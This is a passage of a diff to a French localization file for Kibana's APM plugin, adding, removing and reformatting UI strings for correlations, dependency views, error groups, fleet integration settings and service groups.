"xpack.apm.correlations.latencyCorrelations.correlationsTable.actionsLabel": "Filtre", - "xpack.apm.correlations.latencyCorrelations.correlationsTable.correlationColumnDescription": "Score de corrélation [0-1] d'un attribut ; plus le score est élevé, plus un attribut augmente la latence.", + "xpack.apm.correlations.latencyCorrelations.correlationsTable.correlationColumnDescription": "Score de corrélation [0-1] d'un attribut ; plus le score est élevé, plus un attribut augmente la latence.", "xpack.apm.correlations.latencyCorrelations.correlationsTable.correlationLabel": "Corrélation", "xpack.apm.correlations.latencyCorrelations.correlationsTable.excludeDescription": "Filtrer la valeur", "xpack.apm.correlations.latencyCorrelations.correlationsTable.excludeLabel": "Exclure", 
@@ -7590,23 +6840,24 @@ "xpack.apm.correlations.latencyPopoverChartExplanation": "Le graphique de distribution de la latence permet de visualiser la latence globale des transactions dans le groupe de transactions. Lorsque vous passez votre souris sur des attributs du tableau, leur distribution de latence est ajoutée au graphique.", "xpack.apm.correlations.latencyPopoverFilterExplanation": "Vous pouvez également ajouter ou retirer des filtres pour modifier les requêtes dans l'application APM.", "xpack.apm.correlations.latencyPopoverPerformanceExplanation": "Cette analyse réalise des recherches statistiques sur un grand nombre d'attributs. Pour les plages temporelles étendues et les services ayant un rendement de transactions élevé, cela peut prendre un certain temps. Réduisez la plage temporelle pour améliorer les performances.", - "xpack.apm.correlations.latencyPopoverTableExplanation": "Le tableau est trié par coefficient de corrélation, de 0 à 1. Les attributs ayant des valeurs de corrélation plus élevées sont plus susceptibles de contribuer à des transactions à haute latence.", + "xpack.apm.correlations.latencyPopoverTableExplanation": "Le tableau est trié par coefficient de corrélation, de 0 à 1. 
Les attributs ayant des valeurs de corrélation plus élevées sont plus susceptibles de contribuer à des transactions à haute latence.", "xpack.apm.correlations.latencyPopoverTitle": "Corrélations de latence", - "xpack.apm.correlations.license.text": "Pour utiliser l'API de corrélations, vous devez disposer d'une licence Elastic Platinum.", + "xpack.apm.correlations.license.text": "Pour utiliser l'API de corrélations, vous devez disposer d'une licence Elastic Platinum.", "xpack.apm.correlations.lowImpactText": "Bas", "xpack.apm.correlations.mediumImpactText": "Moyenne", "xpack.apm.correlations.noCorrelationsTextLine1": "Les corrélations ne seront identifiées que si leur impact est important.", "xpack.apm.correlations.noCorrelationsTextLine2": "Essayez de sélectionner une autre plage temporelle ou de retirer des filtres appliqués.", "xpack.apm.correlations.noCorrelationsTitle": "Aucune corrélation importante", "xpack.apm.correlations.progressAriaLabel": "Progression", - "xpack.apm.correlations.progressTitle": "Progression : {progress} %", "xpack.apm.correlations.refreshButtonTitle": "Actualiser", "xpack.apm.correlations.veryLowImpactText": "Très bas", "xpack.apm.customLink.buttom.create": "Créer un lien personnalisé", "xpack.apm.customLink.buttom.create.title": "Créer", "xpack.apm.customLink.buttom.manage": "Gérer des liens personnalisés", "xpack.apm.customLink.empty": "Aucun lien personnalisé trouvé. Configurez vos propres liens personnalisés, par ex. 
un lien vers un tableau de bord spécifique ou un lien externe.", + "xpack.apm.dependecyOperationDetailView.header.backLinkLabel": "Toutes les opérations", "xpack.apm.dependencies.kueryBarPlaceholder": "Rechercher dans les indicateurs de dépendance (par ex., span.destination.service.resource:elasticsearch)", + "xpack.apm.dependenciesInventory.dependencyTableColumn": "Dépendance", "xpack.apm.dependenciesTable.columnErrorRate": "Taux de transactions ayant échoué", "xpack.apm.dependenciesTable.columnErrorRateTip": "Le pourcentage de transactions ayant échoué pour le service sélectionné. Les transactions du serveur HTTP avec un code du statut 4xx (erreur du client) ne sont pas considérées comme des échecs, car l'appelant, et non le serveur, a provoqué l'échec.", "xpack.apm.dependenciesTable.columnImpact": "Impact", 
@@ -7615,12 +6866,42 @@ "xpack.apm.dependenciesTable.columnThroughput": "Rendement", "xpack.apm.dependenciesTable.notFoundLabel": "Aucune dépendance trouvée", "xpack.apm.dependenciesTable.serviceMapLinkText": "Afficher la carte des services", + "xpack.apm.dependencyDetail.dependenciesTableColumn": "Service", + "xpack.apm.dependencyDetail.dependenciesTableTitle": "Services en amont", + "xpack.apm.dependencyDetailFailedTransactionRateChartTitle": "Taux de transactions ayant échoué", + "xpack.apm.dependencyDetailLatencyChartTitle": "Latence", + "xpack.apm.dependencyDetailOperations.breadcrumbTitle": "Opérations", + "xpack.apm.DependencyDetailOperations.title": "Opérations", + "xpack.apm.dependencyDetailOperationsList.notFoundLabel": "Aucune opération trouvée", + "xpack.apm.dependencyDetailOperationsList.spanNameColumnLabel": "Nom de l’intervalle", + "xpack.apm.dependencyDetailOverview.breadcrumbTitle": "Aperçu", + "xpack.apm.DependencyDetailOverview.title": "Aperçu", + "xpack.apm.dependencyDetailThroughputChartTitle": "Rendement", + "xpack.apm.dependencyErrorRateChart.chartTitle": "Taux de transactions ayant échoué", + "xpack.apm.dependencyLatencyChart.chartTitle": "Latence", + "xpack.apm.dependencyOperationDetailTraceList": "Traces", + "xpack.apm.dependencyOperationDetailTraceListDurationColumn": "Durée", + "xpack.apm.dependencyOperationDetailTraceListOutcomeColumn": "Résultat", + "xpack.apm.dependencyOperationDetailTraceListServiceNameColumn": "Service d'origine", + "xpack.apm.dependencyOperationDetailTraceListTimestampColumn": "Horodatage", + "xpack.apm.dependencyOperationDetailTraceListTraceIdColumn": "Trace", + "xpack.apm.dependencyOperationDetailTraceListTransactionNameColumn": "Nom de la transaction", + "xpack.apm.dependencyOperationDistributionChart.allSpansLegendLabel": "Tous les intervalles", + "xpack.apm.dependencyOperationDistributionChart.failedSpansLegendLabel": "Intervalles ayant échoué", + "xpack.apm.dependencyThroughputChart.chartTitle": "Rendement", 
"xpack.apm.deprecations.legacyModeTitle": "Le serveur APM fonctionne en mode hérité", "xpack.apm.deprecations.message": "L'exécution directe du binaire du serveur APM est considérée comme une option héritée et sera déclassée et retirée à l'avenir.", "xpack.apm.deprecations.steps.apm": "Naviguer vers Observabilité/APM", "xpack.apm.deprecations.steps.schema": "Sélectionner l'onglet \"Schema\"", "xpack.apm.deprecations.steps.settings": "Cliquer sur \"Settings\"", "xpack.apm.deprecations.steps.switch": "Cliquez sur \"Passer à Elastic Agent\". Vous serez guidé tout au long du processus", + "xpack.apm.durationDistribution.chart.currentEventMarkerLabel": "Échantillon actuel", + "xpack.apm.durationDistribution.chart.latencyLabel": "Latence", + "xpack.apm.durationDistribution.chart.numberOfSpansLabel": "Intervalles", + "xpack.apm.durationDistribution.chart.numberOfTransactionsLabel": "Transactions", + "xpack.apm.durationDistributionChartWithScrubber.clearSelectionAriaLabel": "Effacer la sélection", + "xpack.apm.durationDistributionChartWithScrubber.emptySelectionText": "Glisser et déposer pour sélectionner une plage", + "xpack.apm.durationDistributionChartWithScrubber.panelTitle": "Distribution de la latence", "xpack.apm.emptyMessage.noDataFoundDescription": "Essayez avec une autre plage temporelle ou réinitialisez le filtre de recherche.", "xpack.apm.emptyMessage.noDataFoundLabel": "Aucune donnée trouvée.", "xpack.apm.environmentsSelectCustomOptionText": "Ajouter \\{searchValue\\} en tant que nouvel environnement", 
@@ -7631,18 +6912,26 @@ "xpack.apm.errorCountAlertTrigger.errors": " erreurs", "xpack.apm.errorGroup.chart.ocurrences": "Occurrences", "xpack.apm.errorGroupDetails.culpritLabel": "Coupable", - "xpack.apm.errorGroupDetails.errorGroupTitle": "Groupe d'erreurs {errorGroupId}", "xpack.apm.errorGroupDetails.errorOccurrenceTitle": "Occurrence d'erreur", "xpack.apm.errorGroupDetails.exceptionMessageLabel": "Message d'exception", "xpack.apm.errorGroupDetails.logMessageLabel": "Message log", "xpack.apm.errorGroupDetails.occurrencesChartLabel": "Occurrences", + "xpack.apm.errorGroupDetails.occurrencesLabel": "Occurrences", "xpack.apm.errorGroupDetails.relatedTransactionSample": "Échantillon de transaction associée", "xpack.apm.errorGroupDetails.unhandledLabel": "Non géré", - "xpack.apm.errorGroupDetails.viewOccurrencesInDiscoverButtonLabel": "Visualiser {occurrencesCount} {occurrencesCount, plural, one {l'occurrence} other {les occurrences}} dans Discover", "xpack.apm.errorGroupDetails.viewOccurrencesInTraceExplorer": "Explorer les traces ayant cette erreur", + "xpack.apm.errorGroupTopTransactions.column.occurrences": "Occurrences d'erreurs", + "xpack.apm.errorGroupTopTransactions.column.transactionName": "Nom de la transaction", + "xpack.apm.errorGroupTopTransactions.errorMessage": "Impossible de récupérer", + "xpack.apm.errorGroupTopTransactions.loading": "Chargement...", + "xpack.apm.errorGroupTopTransactions.noResults": "Aucune erreur trouvée associée à des transactions", + "xpack.apm.errorGroupTopTransactions.title": "5 principales transactions affectées", "xpack.apm.errorRate": "Taux de transactions ayant échoué", "xpack.apm.errorRate.chart.errorRate": "Taux de transactions ayant échoué (moy.)", "xpack.apm.errorRate.tip": "Le pourcentage de transactions ayant échoué pour le service sélectionné. 
Les transactions du serveur HTTP avec un code du statut 4xx (erreur du client) ne sont pas considérées comme des échecs, car l'appelant, et non le serveur, a provoqué l'échec.", + "xpack.apm.errorsTable.columnLastSeen": "Vu en dernier", + "xpack.apm.errorsTable.columnName": "Nom", + "xpack.apm.errorsTable.columnOccurrences": "Occurrences", "xpack.apm.errorsTable.errorMessageAndCulpritColumnLabel": "Message d'erreur et coupable", "xpack.apm.errorsTable.groupIdColumnDescription": "Hachage de la trace de pile. Regroupe les erreurs similaires, même lorsque le message d'erreur est différent en raison des paramètres dynamiques.", "xpack.apm.errorsTable.groupIdColumnLabel": "ID du groupe", @@ -7651,8 +6940,7 @@ "xpack.apm.errorsTable.occurrencesColumnLabel": "Occurrences", "xpack.apm.errorsTable.typeColumnLabel": "Type", "xpack.apm.errorsTable.unhandledLabel": "Non géré", - "xpack.apm.exactTransactionRateLabel": "{value} tpm", - "xpack.apm.failedTransactionsCorrelations.licenseCheckText": "Pour utiliser la fonctionnalité de corrélation des transactions ayant échoué, vous devez disposer d'une licence Elastic Platinum. Cette fonctionnalité vous aide à découvrir quels attributs contribuent à l'échec des transactions.", + "xpack.apm.failedTransactionsCorrelations.licenseCheckText": "Pour utiliser la fonctionnalité de corrélation des transactions ayant échoué, vous devez disposer d'une licence Elastic Platinum. Cette fonctionnalité vous aide à découvrir quels attributs contribuent à l'échec des transactions.", "xpack.apm.failure_badge.tooltip": "event.outcome = échec", "xpack.apm.featureRegistry.apmFeatureName": "APM et expérience utilisateur", "xpack.apm.feedbackMenu.appName": "APM", 
@@ -7708,7 +6996,12 @@ "xpack.apm.fleet_integration.settings.apm.shutdownTimeoutLabel": "Durée maximale avant la libération des ressources lors de l'arrêt", "xpack.apm.fleet_integration.settings.apm.urlLabel": "URL", "xpack.apm.fleet_integration.settings.apm.writeTimeoutLabel": "Durée maximale pour la rédaction d'une réponse", - "xpack.apm.fleet_integration.settings.apmAgent.description": "Configurez l'instrumentation pour les applications {title}.", + "xpack.apm.fleet_integration.settings.debug.expvarEnabledDescription": "Exposé sous /debug/vars", + "xpack.apm.fleet_integration.settings.debug.expvarEnabledTitle": "Activer la prise en charge d'expvar de Golang pour le serveur APM", + "xpack.apm.fleet_integration.settings.debug.pprofEnabledDescription": "Exposer les points de terminaison HTTP pour récupérer les données de profilage", + "xpack.apm.fleet_integration.settings.debug.pprofEnabledTitle": "Activer la prise en charge de pprof pour le serveur APM", + "xpack.apm.fleet_integration.settings.debug.settings.subtitle": "Paramètres pour les indicateurs de débogage du serveur APM", + "xpack.apm.fleet_integration.settings.debug.settings.title": "Paramètres de débogage", "xpack.apm.fleet_integration.settings.disabledLabel": "Désactivé", "xpack.apm.fleet_integration.settings.enabledLabel": "Activé", "xpack.apm.fleet_integration.settings.optionalLabel": "Facultatif", 
@@ -7716,7 +7009,8 @@ "xpack.apm.fleet_integration.settings.platinumBadgeTooltipDescription": "Les configurations sont enregistrées mais ignorées si votre licence Kibana n'est pas Platinum.", "xpack.apm.fleet_integration.settings.platinumBadgeTooltipTitle": "Licence Platinum requise", "xpack.apm.fleet_integration.settings.requiredFieldLabel": "Champ requis", - "xpack.apm.fleet_integration.settings.requiredLabel": "Requis", + "xpack.apm.fleet_integration.settings.requiredLabel": "Obligatoire", + "xpack.apm.fleet_integration.settings.rum.allowedHeadersValidation": "Crochets droits non autorisés", "xpack.apm.fleet_integration.settings.rum.enableRumDescription": "Activer le monitoring des utilisateurs réels (RUM)", "xpack.apm.fleet_integration.settings.rum.enableRumTitle": "Activer RUM", "xpack.apm.fleet_integration.settings.rum.rumAllowHeaderDescription": "Configurer l'authentification pour l'agent", @@ -7724,7 +7018,7 @@ "xpack.apm.fleet_integration.settings.rum.rumAllowHeaderLabel": "Access-Control-Allow-Headers", "xpack.apm.fleet_integration.settings.rum.rumAllowHeaderTitle": "En-têtes personnalisés", "xpack.apm.fleet_integration.settings.rum.rumAllowOriginsHelpText": "En-têtes Origin autorisés pouvant être envoyés par les agents utilisateurs.", - "xpack.apm.fleet_integration.settings.rum.rumAllowOriginsLabel": "En-têtes Origin", + "xpack.apm.fleet_integration.settings.rum.rumAllowOriginsLabel": "Origines autorisées", "xpack.apm.fleet_integration.settings.rum.rumExcludeFromGroupingHelpText": "Exclure les cadres des traces de pile du calcul des groupes d'erreurs en faisant correspondre le \"file_name\" d'un cadre de trace de pile avec ce regexp.", "xpack.apm.fleet_integration.settings.rum.rumExcludeFromGroupingLabel": "Exclure du regroupement", "xpack.apm.fleet_integration.settings.rum.rumLibraryPatternHelpText": "Identifiez les cadres de la bibliothèque en faisant correspondre le file_name et le abs_path du cadre de la trace de pile avec ce regexp.", 
@@ -7744,13 +7038,12 @@ "xpack.apm.fleet_integration.settings.tailSampling.tailSamplingPolicies": "Politiques d'échantillonnage de la queue", "xpack.apm.fleet_integration.settings.tailSampling.tailSamplingPoliciesDescription": "Les politiques mappent les événements de trace à un taux d'échantillonnage. Chaque politique doit spécifier un taux d'échantillonnage. Les événements de trace sont mis en correspondance avec les politiques dans l'ordre spécifié. Toutes les conditions de la politique doivent être vraies pour qu'un événement de trace corresponde. Chaque liste de politiques doit se terminer par une politique qui ne spécifie qu'un taux d'échantillonnage. Cette politique finale est utilisée pour repérer les événements de trace restants qui ne correspondent pas à une politique plus stricte.", "xpack.apm.fleet_integration.settings.tailSampling.tailSamplingPoliciesTitle": "Politiques", - "xpack.apm.fleet_integration.settings.tailSamplingDocsHelpText": "Pour en savoir plus sur les politiques d'échantillonnage de la queue, consultez notre {link}.", "xpack.apm.fleet_integration.settings.tailSamplingDocsHelpTextLink": "documents", "xpack.apm.fleet_integration.settings.tls.settings.subtitle": "Paramètres pour la certification TLS.", "xpack.apm.fleet_integration.settings.tls.settings.title": "Paramètres TLS", "xpack.apm.fleet_integration.settings.tls.tlsCertificateLabel": "Chemin d'accès au certificat du serveur", "xpack.apm.fleet_integration.settings.tls.tlsCertificateTitle": "Certificat TLS", - "xpack.apm.fleet_integration.settings.tls.tlsCipherSuitesHelpText": "Ne peut pas être configuré pour TLS 1.3.", + "xpack.apm.fleet_integration.settings.tls.tlsCipherSuitesHelpText": "Ne peut pas être configuré pour TLS 1.3.", "xpack.apm.fleet_integration.settings.tls.tlsCipherSuitesLabel": "Suites de chiffrement pour les connexions TLS", "xpack.apm.fleet_integration.settings.tls.tlsCurveTypesLabel": "Types de courbes pour les suites de chiffrement ECDHE", 
"xpack.apm.fleet_integration.settings.tls.tlsEnabledTitle": "Activer TLS", 
@@ -7772,15 +7065,14 @@ "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.manualInstrumentation": "Instrumentation manuelle", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.unsavedRules": "Des modifications ne sont pas enregistrées. Cliquez sur \"Enregistrer l'intégration\" pour synchroniser les modifications apportées à l'intégration.", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version": "Version", - "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.helpText": "Entrez la {versionLink} de l'agent Java Elastic APM qui doit être attachée.", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.helpText.version": "version", "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.version.invalid": "Version non valide", + "xpack.apm.fleetIntegration.apmAgent.runtimeAttachment.versionSelect.placeHolder": "Sélectionner une version", "xpack.apm.fleetIntegration.assets.description": "Consulter les traces de l'application et les cartes de service dans APM", "xpack.apm.fleetIntegration.assets.name": "Services", "xpack.apm.fleetIntegration.enrollmentFlyout.installApmAgentButtonText": "Installer l'agent APM", "xpack.apm.fleetIntegration.enrollmentFlyout.installApmAgentDescription": "Une fois l'agent lancé, vous pouvez installer des agents APM sur vos hôtes pour collecter des données depuis vos applications et services.", "xpack.apm.fleetIntegration.enrollmentFlyout.installApmAgentTitle": "Installer l'agent APM", - "xpack.apm.fleetIntegration.javaRuntime.discoveryRulesDescription": "Pour chaque JVM en cours d'exécution, les règles de découverte sont évaluées dans l'ordre où elles sont fournies. La première règle de correspondance détermine le résultat. 
Découvrez plus d'informations dans le {docLink}.", "xpack.apm.fleetIntegration.javaRuntime.discoveryRulesDescription.docLink": "documents", "xpack.apm.fleetIntegration.javaRuntime.operationType.exclude": "Exclure", "xpack.apm.fleetIntegration.javaRuntime.operationType.exclude.options.main": "principale", 
@@ -7809,25 +7101,29 @@ "xpack.apm.home.alertsMenu.transactionDuration": "Latence", "xpack.apm.home.alertsMenu.transactionErrorRate": "Taux de transactions ayant échoué", "xpack.apm.home.alertsMenu.viewActiveAlerts": "Gérer les règles", + "xpack.apm.home.alertsTabLabel": "Alertes", "xpack.apm.home.infraTabLabel": "Infrastructure", "xpack.apm.home.serviceLogsTabLabel": "Logs", "xpack.apm.home.serviceMapTabLabel": "Carte des services", + "xpack.apm.infraTabs.emptyMessageIllustrationAlternativeText": "Une loupe avec un point d'exclamation", + "xpack.apm.infraTabs.emptyMessagePromptDescription": "Essayez de rechercher sur une période plus longue.", + "xpack.apm.infraTabs.emptyMessagePromptTimeRangeTitle": "Étendre la plage temporelle", + "xpack.apm.infraTabs.emptyMessagePromptTitle": "Aucun résultat ne correspond à vos critères de recherche.", "xpack.apm.infraTabs.failurePromptDescription": "Un problème est survenu lors du chargement de l'onglet Infrastructure et de vos données. Vous pouvez contacter votre administrateur pour obtenir de l'aide.", "xpack.apm.infraTabs.failurePromptTitle": "Impossible de charger vos données d'infrastructure", "xpack.apm.inspectButtonText": "Inspecter", "xpack.apm.instancesLatencyDistributionChartLegend": "Instances", "xpack.apm.instancesLatencyDistributionChartTitle": "Distribution de la latence des instances", "xpack.apm.instancesLatencyDistributionChartTooltipClickToFilterDescription": "Cliquer pour filtrer par instance", - "xpack.apm.instancesLatencyDistributionChartTooltipInstancesTitle": "{instancesCount} {instancesCount, plural, one {instance} other {instances}}", "xpack.apm.instancesLatencyDistributionChartTooltipLatencyLabel": "Latence", "xpack.apm.instancesLatencyDistributionChartTooltipThroughputLabel": "Rendement", "xpack.apm.invalidLicense.licenseManagementLink": "Gérer votre licence", "xpack.apm.invalidLicense.message": "L'interface utilisateur d'APM n'est pas disponible car votre licence actuelle a expiré ou n'est plus 
valide.", "xpack.apm.invalidLicense.title": "Licence non valide", "xpack.apm.jobsList.updateCompletedToastText": "Vos nouvelles tâches de détection d'anomalies ont bien été créées. Vous commencerez à voir les résultats de la détection des anomalies dans l'application dans quelques minutes. Les anciennes tâches ont été fermées, mais les résultats sont toujours disponibles dans Machine Learning.", - "xpack.apm.jobsList.updateCompletedToastTitle": "Tâches de détection des anomalies créées !", + "xpack.apm.jobsList.updateCompletedToastTitle": "Tâches de détection des anomalies créées !", "xpack.apm.jvmsTable.cpuColumnLabel": "Moy. CPU", - "xpack.apm.jvmsTable.explainServiceNodeNameMissing": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème.", + "xpack.apm.jvmsTable.explainServiceNodeNameMissing": "Nous n'avons pas pu déterminer à quelles JVM ces indicateurs correspondent. Cela provient probablement du fait que vous exécutez une version du serveur APM antérieure à 7.5. La mise à niveau du serveur APM vers la version 7.5 ou supérieure devrait résoudre le problème.", "xpack.apm.jvmsTable.heapMemoryColumnLabel": "Moy. segment de mémoire", "xpack.apm.jvmsTable.hostName": "Nom d'hôte", "xpack.apm.jvmsTable.nameColumnLabel": "Nom", 
@@ -7836,22 +7132,21 @@ "xpack.apm.jvmsTable.nonHeapMemoryColumnLabel": "Moy. segment de mémoire sans tas", "xpack.apm.jvmsTable.threadCountColumnLabel": "Nombre de threads max", "xpack.apm.keyValueFilterList.actionFilterLabel": "Filtrer par valeur", - "xpack.apm.kueryBar.placeholder": "Rechercher {event, select,\n transaction {des transactions}\n metric {des indicateurs}\n error {des erreurs}\n other {des transactions, des erreurs et des indicateurs}\n } (par ex. {queryExample})", - "xpack.apm.latencyCorrelations.licenseCheckText": "Pour utiliser les corrélations de latence, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de découvrir quels champs sont corrélés à de faibles performances.", + "xpack.apm.latencyCorrelations.licenseCheckText": "Pour utiliser les corrélations de latence, vous devez disposer d'une licence Elastic Platinum. Elle vous permettra de découvrir quels champs sont corrélés à de faibles performances.", "xpack.apm.license.betaBadge": "Version bêta", "xpack.apm.license.betaTooltipMessage": "Cette fonctionnalité est actuellement en version bêta. Si vous rencontrez des bugs ou si vous souhaitez apporter des commentaires, ouvrez un ticket de problème ou visitez notre forum de discussion.", "xpack.apm.license.button": "Commencer l'essai", - "xpack.apm.license.title": "Commencer un essai gratuit de 30 jours", + "xpack.apm.license.title": "Commencer un essai gratuit de 30 jours", "xpack.apm.managedTable.errorMessage": "Impossible de récupérer", "xpack.apm.managedTable.loadingDescription": "Chargement…", "xpack.apm.metadata.help": "Comment ajouter des étiquettes et d'autres données", - "xpack.apm.metrics.transactionChart.machineLearningLabel": "Machine Learning :", - "xpack.apm.metrics.transactionChart.machineLearningTooltip": "Le flux affiche les limites attendues de la latence moyenne. 
Une annotation verticale rouge signale des anomalies avec un score d'anomalie de 75 ou plus.", - "xpack.apm.metrics.transactionChart.machineLearningTooltip.withKuery": "Les résultats de Machine Learning sont masqués lorsque la barre de recherche est utilisée comme filtre", + "xpack.apm.metrics.transactionChart.machineLearningLabel": "Machine Learning :", + "xpack.apm.metrics.transactionChart.machineLearningTooltip": "Le flux affiche les limites attendues de la latence moyenne. Une annotation verticale rouge signale des anomalies avec un score d'anomalie de 75 ou plus.", + "xpack.apm.metrics.transactionChart.machineLearningTooltip.withKuery": "Les résultats de Machine Learning sont masqués lorsque la barre de recherche est utilisée comme filtre", "xpack.apm.metrics.transactionChart.viewJob": "Afficher la tâche", "xpack.apm.mlCallout.dismissButton": "Rejeter", "xpack.apm.mlCallout.learnMoreButton": "En savoir plus", - "xpack.apm.mlCallout.legacyJobsCalloutText": "Nous avons découvert d'anciennes tâches de Machine Learning de notre précédente intégration qui ne sont plus utilisées dans l'application APM", + "xpack.apm.mlCallout.legacyJobsCalloutText": "Nous avons découvert d'anciennes tâches de Machine Learning de notre précédente intégration qui ne sont plus utilisées dans l'application APM", "xpack.apm.mlCallout.legacyJobsCalloutTitle": "Les anciennes tâches ML ne sont plus utilisées dans l'application APM", "xpack.apm.mlCallout.noJobsCalloutButtonText": "Créer une tâche de ML", "xpack.apm.mlCallout.noJobsCalloutText": "Identifiez les transactions anormales et consultez l'intégrité des services en amont et en aval grâce à l'intégration de la détection des anomalies d'APM. Lancez-vous en quelques minutes seulement.", 
@@ -7860,6 +7155,7 @@ "xpack.apm.mlCallout.updateAvailableCalloutText": "Nous avons mis à jour les tâches de détection des anomalies qui fournissent des indications sur la dégradation des performances et ajouté des détecteurs de débit et de taux de transactions ayant échoué. Si vous choisissez de mettre à jour, nous créerons les nouvelles tâches et fermerons les tâches héritées. Les données affichées dans l'application APM passeront automatiquement aux nouvelles. Veuillez noter que l'option de migration de toutes les tâches existantes ne sera pas disponible si vous choisissez de créer une nouvelle tâche.", "xpack.apm.mlCallout.updateAvailableCalloutTitle": "Mises à jour disponibles", "xpack.apm.navigation.allServicesTitle": "Tous les services", + "xpack.apm.navigation.apmSettingsTitle": "Paramètres", "xpack.apm.navigation.dependenciesTitle": "Dépendances", "xpack.apm.navigation.serviceMapTitle": "Carte des services", "xpack.apm.navigation.servicesTitle": "Services", @@ -7873,8 +7169,7 @@ "xpack.apm.profiling.highlightFrames": "Rechercher", "xpack.apm.profiling.table.name": "Nom", "xpack.apm.profiling.table.value": "Auto", - "xpack.apm.propertiesTable.agentFeature.noDataAvailableLabel": "Pas de données disponibles", - "xpack.apm.propertiesTable.agentFeature.noResultFound": "Pas de résultats pour \"{value}\".", + "xpack.apm.propertiesTable.agentFeature.noDataAvailableLabel": "Aucune donnée disponible", "xpack.apm.propertiesTable.tabs.exceptionStacktraceLabel": "Trace de pile d'exception", "xpack.apm.propertiesTable.tabs.logs.serviceName": "Nom de service", "xpack.apm.propertiesTable.tabs.logsLabel": "Logs", 
@@ -7883,7 +7178,7 @@
 "xpack.apm.propertiesTable.tabs.spanLinks": "Liens d'intervalle",
 "xpack.apm.propertiesTable.tabs.timelineLabel": "Chronologie",
 "xpack.apm.searchInput.filter": "Filtrer…",
- "xpack.apm.selectPlaceholder": "Sélectionner une option :",
+ "xpack.apm.selectPlaceholder": "Sélectionner une option :",
 "xpack.apm.serviceDependencies.breakdownChartTitle": "Temps consacré par dépendance",
 "xpack.apm.serviceDetails.dependenciesTabLabel": "Dépendances",
 "xpack.apm.serviceDetails.errorsTabLabel": "Erreurs",
@@ -7901,19 +7196,11 @@
 "xpack.apm.serviceGroup.serviceMap": "Carte des services",
 "xpack.apm.serviceGroups.breadcrumb.title": "Services",
 "xpack.apm.serviceGroups.cardsList.emptyDescription": "Aucune description disponible",
- "xpack.apm.serviceGroups.cardsList.serviceCount": "{servicesCount} {servicesCount, plural, one {service} other {services}}",
- "xpack.apm.serviceGroups.createFailure.toast.title": "Erreur lors de la création du groupe \"{groupName}\"",
 "xpack.apm.serviceGroups.createGroupLabel": "Créer un groupe",
 "xpack.apm.serviceGroups.createSuccess.toast.text": "Votre groupe est maintenant visible dans la nouvelle vue Services pour les groupes.",
- "xpack.apm.serviceGroups.createSucess.toast.title": "Groupe \"{groupName}\" créé",
- "xpack.apm.serviceGroups.deleteFailure.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"",
- "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.text": "Impossible de supprimer le groupe : id du groupe de service inconnu.",
- "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.title": "Erreur lors de la suppression du groupe \"{groupName}\"",
- "xpack.apm.serviceGroups.deleteSuccess.toast.title": "Groupe \"{groupName}\" supprimé",
- "xpack.apm.serviceGroups.editFailure.toast.title": "Erreur lors de la modification du groupe \"{groupName}\"",
+ "xpack.apm.serviceGroups.deleteFailure.unknownId.toast.text": "Impossible de supprimer le groupe : id du groupe de service inconnu.",
 "xpack.apm.serviceGroups.editGroupLabel": "Modifier un groupe",
 "xpack.apm.serviceGroups.editSuccess.toast.text": "Nouveaux changements dans le groupe de services enregistrés.",
- "xpack.apm.serviceGroups.editSucess.toast.title": "Groupe \"{groupName}\" modifié",
 "xpack.apm.serviceGroups.emptyPrompt.message": "Aucun groupe trouvé pour ce filtre",
 "xpack.apm.serviceGroups.emptyPrompt.serviceGroups": "Groupes de services",
 "xpack.apm.serviceGroups.groupDetailsForm.cancel": "Annuler",
@@ -7926,7 +7213,6 @@
 "xpack.apm.serviceGroups.groupDetailsForm.invalidColorError": "Veuillez fournir une valeur de couleur valide",
 "xpack.apm.serviceGroups.groupDetailsForm.name": "Nom",
 "xpack.apm.serviceGroups.groupDetailsForm.selectServices": "Sélectionner des services",
- "xpack.apm.serviceGroups.groupsCount": "{servicesCount} {servicesCount, plural, =0 {groupe} one {groupe} other {groupes}}",
 "xpack.apm.serviceGroups.list.allServices.description": "Afficher tous les services",
 "xpack.apm.serviceGroups.list.allServices.name": "Tous les services",
 "xpack.apm.serviceGroups.list.sort.alphabetical": "Alphabétique",
@@ -7934,18 +7220,16 @@
 "xpack.apm.serviceGroups.selectServicesForm.cancel": "Annuler",
 "xpack.apm.serviceGroups.selectServicesForm.editGroupDetails": "Modifier les détails du groupe",
 "xpack.apm.serviceGroups.selectServicesForm.kql": "Par exemple, labels.team : \"web\"",
- "xpack.apm.serviceGroups.selectServicesForm.matchingServiceCount": "{servicesCount} {servicesCount, plural, =0 {service correspond} one {service correspond} other {services correspondent}} à la requête",
 "xpack.apm.serviceGroups.selectServicesForm.panelLabel": "Entrer une requête pour sélectionner les services",
 "xpack.apm.serviceGroups.selectServicesForm.preview": "Aperçu",
 "xpack.apm.serviceGroups.selectServicesForm.refresh": "Actualiser",
 "xpack.apm.serviceGroups.selectServicesForm.saveGroup": "Enregistrer le groupe",
- "xpack.apm.serviceGroups.selectServicesForm.subtitle": "Utilisez une requête pour sélectionner les services pour ce groupe. Les services qui correspondent à cette requête dans les dernières 24 heures seront affectés au groupe.",
+ "xpack.apm.serviceGroups.selectServicesForm.subtitle": "Utilisez une requête pour sélectionner les services pour ce groupe. Les services qui correspondent à cette requête dans les dernières 24 heures seront affectés au groupe.",
 "xpack.apm.serviceGroups.selectServicesForm.title": "Sélectionner des services",
 "xpack.apm.serviceGroups.selectServicesList.environmentColumnLabel": "Environnements",
 "xpack.apm.serviceGroups.selectServicesList.nameColumnLabel": "Nom",
- "xpack.apm.serviceGroups.selectServicesList.notFoundLabel": "Aucun service disponible dans les dernières 24 heures. Vous pouvez toujours créer le groupe et les services qui correspondent à votre requête.",
+ "xpack.apm.serviceGroups.selectServicesList.notFoundLabel": "Aucun service disponible dans les dernières 24 heures. 
Vous pouvez toujours créer le groupe et les services qui correspondent à votre requête.",
 "xpack.apm.serviceGroups.sortLabel": "Trier",
